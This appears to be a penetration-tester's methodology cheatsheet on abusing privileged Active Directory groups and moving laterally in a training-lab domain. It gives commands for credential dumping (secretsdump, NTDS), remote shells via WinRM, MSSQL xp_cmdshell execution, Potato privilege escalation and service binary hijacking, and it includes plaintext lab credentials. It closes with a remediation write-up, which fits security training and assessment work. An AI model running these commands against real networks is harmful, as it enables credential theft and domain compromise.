🛡️ Methodology Checklist
- Check group membership for high-value groups: Domain Admins, Enterprise Admins, Backup Operators
- RDP to DCs/servers if credentials allow
- WinRM/PSRemoting to servers with found credentials
- Check who has local admin on workstations: BloodHound → “Local Admin” edges
- secretsdump for local SAM if admin:
impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[TARGET] - NTDS dump from DC if Domain Admin
- Document all privileged access obtained for report
🎯 Operational Context
Use when: Privileged AD group memberships identified — abuse Backup Operators, Server Operators, Account Operators, or GPO admin rights for escalation. Think Dumber First: Backup Operators can read any file on DC via VSS — including NTDS.dit. Server Operators can start/stop services and modify service binaries. Account Operators can add to non-protected groups. Each group has a specific escalation path. Skip when: Direct DA path available — don’t use indirect privileged group abuse when DA access is one step away.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
Get-NetLocalGroupMember -ComputerName [HOSTNAME] -GroupName "Remote Desktop Users" | PowerView — who has RDP access on a host |
Get-NetLocalGroupMember -ComputerName [HOSTNAME] -GroupName "Remote Management Users" | PowerView — who has WinRM access on a host |
evil-winrm -i [TARGET_IP] -u [USER] -p '[PASS]' | WinRM shell from Linux |
Enter-PSSession -ComputerName [HOSTNAME] -Credential [DOMAIN]\[USER] | WinRM shell from Windows (PSCredential required) |
mssqlclient.py [DOMAIN]/[USER]@[TARGET_IP] -windows-auth | Connect to MSSQL with Windows auth (Impacket) |
enable_xp_cmdshell | Enable OS command execution in MSSQL |
xp_cmdshell whoami /priv | Execute OS command via MSSQL |
🔬 Deep Dive & Workflow
BloodHound Cypher Queries:
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2
Non-Admin Lateral Movement Vectors
Standard PtH over SMB requires local admin rights. These three vectors let you move laterally without them:
| Vector | BloodHound Edge | Group Controlling Access | Tool |
|---|---|---|---|
| RDP | CanRDP | Remote Desktop Users | xfreerdp, mstsc |
| WinRM / PSRemote | CanPSRemote | Remote Management Users | evil-winrm, Enter-PSSession |
| MSSQL | SQLAdmin | db_owner, sysadmin | mssqlclient.py |
WinRM Access
# From Linux
evil-winrm -i 10.129.201.234 -u forend -p Klmcargo2
# From Windows (build PSCredential first)
$pass = ConvertTo-SecureString 'Klmcargo2' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\forend', $pass)
Enter-PSSession -ComputerName ACADEMY-EA-MS01 -Credential $credMSSQL Escalation
Credentials found via Kerberoasting or in web.config files frequently authenticate to MSSQL:
mssqlclient.py INLANEFREIGHT/damundsen@172.16.5.150 -windows-auth
# Enable OS execution
enable_xp_cmdshell
xp_cmdshell whoami /privSeImpersonatePrivilege pivot: MSSQL service accounts almost always hold SeImpersonatePrivilege. Once inside via xp_cmdshell, route a Potato exploit (JuicyPotato, PrintSpoofer, RoguePotato) to reach SYSTEM.
Post-Lateral-Movement Loop
Every new host requires immediate re-enumeration:
- Check
whoami /privforSeImpersonatePrivilege,SeDebugPrivilege - Hunt for credentials in files, registry, browser profiles
- Check running services for unquoted paths / writable binaries
- Enumerate which other hosts this user can reach (local admin check)
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Backup Operators shadow copy fails | Need interactive logon or RDP | Use diskshadow.exe via WinRM: wmic shadowcopy call create Volume='C:\' |
| Server Operators service modification fails | Service already running or protected | Stop service first: sc stop [SVC]; then modify binary path |
| Account Operators can’t add to Domain Admins | AdminSDHolder protection | Account Operators cannot modify adminCount=1 groups; target non-protected groups instead |
| GPO modification requires SYSVOL write | Permissions blocked | Confirm: nxc smb [DC] -u [USER] -p [PASS] --shares shows SYSVOL with WRITE |
| DnsAdmins DLL injection requires DNS restart | DNS service restart needed | sc stop DNS && sc start DNS requires Server Operator or DNS Admin rights |
📝 Reporting Trigger
Finding Title: Privileged AD Group Membership Enables Domain Escalation Impact: Membership in Backup Operators, Server Operators, or DnsAdmins groups provides indirect paths to Domain Admin equivalent access through VSS access to NTDS.dit, service binary modification, or DNS DLL injection. Root Cause: Users granted privileged group membership beyond operational requirements. Privileged groups not included in Tier 0 administration model review. Recommendation: Audit all privileged group memberships and remove unnecessary access. Treat Backup Operators, Server Operators, Account Operators, and DnsAdmins as Tier 0 sensitive groups. Implement JIT access for privileged groups. Alert on sensitive group membership changes.